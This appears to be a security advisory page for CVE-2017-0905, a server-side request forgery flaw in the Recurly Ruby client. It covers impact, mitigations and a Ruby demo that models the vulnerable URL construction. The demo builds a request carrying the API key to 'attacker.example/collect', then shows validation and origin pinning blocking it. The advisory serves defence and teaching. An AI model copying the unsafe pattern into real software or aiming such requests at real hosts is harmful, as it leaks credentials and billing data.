Platform: ruby
Component: recurly
Fixed in: 2.3.10
CVE-2017-0905 is a Server-Side Request Forgery (SSRF) vulnerability in the Recurly Client Ruby Library (the recurly gem). The Resource#find method built its outbound request URL from the identifier it was given, so an attacker who controls that identifier can make the library send requests to hosts of their choosing, whether internal services that should not be reachable or a server the attacker operates. The vulnerability affects versions of the library up to and including 2.3.9. A fix is available in version 2.3.10.
The weakness is reachable whenever an application passes attacker-influenced input, such as an account code taken from a request parameter, straight into Resource#find. An identifier that is an absolute URL is enough to redirect the request. The impact is worse than a generic SSRF because the library authenticates every request with the integration's private Recurly API key (sent as HTTP Basic auth), so a request redirected to an attacker-controlled host delivers that key along with it. Since Recurly manages subscription billing, a leaked API key is a direct path to customer and payment data and to account manipulation. The pattern is the familiar one for SSRF in API clients: the attacker does not need network access of their own, they borrow the application's network position and its credentials.
CVE-2017-0905 was publicly disclosed on December 6, 2017. While no active exploitation campaigns have been definitively linked to this vulnerability, SSRF vulnerabilities are frequently targeted. The CVSS score of 9.8 indicates a critical severity. There are publicly available proof-of-concept exploits demonstrating the SSRF vulnerability. This CVE is not currently listed on the CISA KEV catalog.
EPSS: 0.52% (67th percentile)
The primary mitigation for CVE-2017-0905 is to upgrade the Recurly Client Ruby Library to version 2.3.10 or later. If upgrading is not immediately feasible because of compatibility concerns, do not pass untrusted input to Resource#find: look identifiers up from your own database, or validate that the value is an opaque account code (no scheme, no slashes, no "//") before the call. Independently of that, restrict egress from the application host so it can only reach the Recurly API endpoint; this is the control that still works when input validation is bypassed. A Web Application Firewall with SSRF rules can block URL-shaped values arriving in request parameters, but it only sees inbound traffic, so treat it as a supplementary filter rather than the fix. If you cannot rule out that a vulnerable version was exploited, rotate the Recurly private API key. After upgrading, confirm the fix in a test by calling Resource#find with an absolute URL pointing at a host you control and verifying that the library raises an error and that no request reaches that host.
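The following Ruby script is an added example and is not code from the Recurly client library or from the advisory. It models the URL-construction pattern described above (an identifier that becomes a request URL, with the API key attached as Basic auth) and the two controls a practitioner would add around such a call: rejecting identifiers that are not opaque account codes, and pinning the resolved request to the configured API origin. The base URL, API key, identifier character set and the `accounts/` path are assumptions for the demo; the real library's internals differ.

```ruby
require "uri"
require "net/http"

# Added example, not Recurly code. Base URL and API key are constructed values.
API_BASE = "https://example-subdomain.recurly.com/v2/".freeze
API_KEY  = "constructed-private-api-key".freeze

class ForbiddenHostError < StandardError; end

# Unsafe pattern: an identifier that already looks like a URL is used verbatim,
# and anything else is joined onto the base. Both branches let whoever controls
# the identifier pick the destination host (URI.join also honours "//host/...").
def unsafe_request_uri(base, identifier)
  return URI.parse(identifier) if identifier.start_with?("http://", "https://")
  URI.join(base, identifier)
end

# The client authenticates with HTTP Basic auth using the private API key, so
# the key goes to whatever host the URI names.
def build_request(uri, api_key)
  req = Net::HTTP::Get.new(uri)
  req.basic_auth(api_key, "")
  req
end

# Control 1: identifiers must be opaque account codes, never path or URL
# fragments. This character set is an assumption for the demo.
OPAQUE_IDENTIFIER = /\A[A-Za-z0-9._@-]{1,50}\z/

def opaque_identifier?(identifier)
  identifier.is_a?(String) && identifier.match?(OPAQUE_IDENTIFIER)
end

# Control 2: whatever the resolved URI is, it must stay on the configured API
# origin. This catches absolute URLs, protocol-relative "//host/..." references
# and anything else the join could produce.
def pinned_request_uri(base, path)
  base_uri = URI.parse(base)
  uri = URI.join(base, path)
  same_origin = uri.scheme == base_uri.scheme &&
                uri.host == base_uri.host &&
                uri.port == base_uri.port
  raise ForbiddenHostError, "request would leave #{base_uri.host}: #{uri}" unless same_origin
  uri
end

# Hardened equivalent of "find account by code": validate, encode, then pin.
def safe_account_uri(base, identifier)
  unless opaque_identifier?(identifier)
    raise ArgumentError, "not an opaque identifier: #{identifier.inspect}"
  end
  pinned_request_uri(base, "accounts/#{URI.encode_www_form_component(identifier)}")
end

# Host an identifier would be sent to, or nil when the hardened path refuses it.
def destination_host(base, identifier, hardened:)
  uri = hardened ? safe_account_uri(base, identifier) : unsafe_request_uri(base, identifier)
  uri.host
rescue ArgumentError, ForbiddenHostError
  nil
end

if __FILE__ == $PROGRAM_NAME
  attacker_value = "https://attacker.example/collect"
  uri = unsafe_request_uri(API_BASE, attacker_value)
  req = build_request(uri, API_KEY)
  puts "unsafe:    #{req.method} #{uri} (#{req['Authorization']})"
  puts "hardened:  #{destination_host(API_BASE, attacker_value, hardened: true).inspect}"
  puts "legit id:  #{destination_host(API_BASE, 'cust-42', hardened: true)}"
end
```

The origin pin in `pinned_request_uri` is the control worth keeping even after upgrading: it is cheap, it does not depend on guessing every malicious identifier shape, and it turns a credential leak into a raised exception you can alert on.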
CVE-2017-0905 is a critical Server-Side Request Forgery vulnerability in the Recurly Client Ruby Library, allowing attackers to potentially access internal resources and compromise API keys.
You are affected if your Ruby application uses the Recurly Client Ruby Library version 2.3.9 or earlier. Upgrade to version 2.3.10 or later to mitigate the risk.
Upgrade the Recurly Client Ruby Library to version 2.3.10 or later. If upgrading is not possible immediately, implement input validation and restrict network access.
While no confirmed active exploitation campaigns are publicly known, SSRF vulnerabilities are frequently targeted, making proactive mitigation essential.
Refer to the Recurly security advisory for detailed information and updates: https://www.recurly.com/security/advisories/recurly-client-ssrf/